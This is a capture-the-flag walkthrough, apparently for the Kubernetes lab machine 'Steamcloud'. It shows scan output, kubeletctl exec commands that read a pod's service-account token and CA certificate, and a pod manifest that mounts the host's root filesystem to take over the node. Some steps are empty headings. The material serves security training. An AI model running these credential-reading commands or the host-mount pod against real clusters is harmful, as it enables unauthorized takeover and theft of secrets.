Steamcloud

February 14, 2024 - 2 mins read

Machine: Linux Difficult: Easy #Kubernetes #cloud

IP: 10.10.14.149

PortScanner

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 08:33 -03
Nmap scan report for 10.10.11.133 (10.10.11.133)
Host is up (0.13s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE          VERSION
22/tcp    open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
2379/tcp  open  ssl/etcd-client?
2380/tcp  open  ssl/etcd-server?
8443/tcp  open  ssl/https-alt
10249/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
10250/tcp open  ssl/http         Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

DirScanner

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, md, text, bak, zip, toml, conf | HTTP method: GET | Threads: 25 | Wordlist size: 14139

Output File: /home/parallels/reports/http_10.10.11.133_10249/_24-02-14_08-38-31.txt

Target: http://10.10.11.133:10249/

[08:38:31] Starting: 
[08:39:17] 200 -    2B  - /healthz                                          
[08:39:25] 200 -   37KB - /metrics

Kubernets API

Install kubeletctl
- https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/
list all the pods on the node
List the running pods

Select the only one that not have the “kubesystem” in that case the nginx

user.txt

root.txt

We need to get the ca.cert and token to authenticate into the cluster

Grab the token
- kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
Grab the C.A
- ./kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee ca.crt
Verify the information where you can find the create permission using the token and the C.A.
- kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
Using the official command line kubectl

kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

create a pod (container) that has the root file system mapped into it. Then I can execute in the pod, and access the mapped volume, which is the full file system of the host.

Evil file

apiVersion: v1 
kind: Pod
metadata:
  name: evilPod
  namespace: default
spec:
  containers:
  - name: evilPod
    image: nginx:1.14.2
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

kubectl apply -f r.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$(cat token)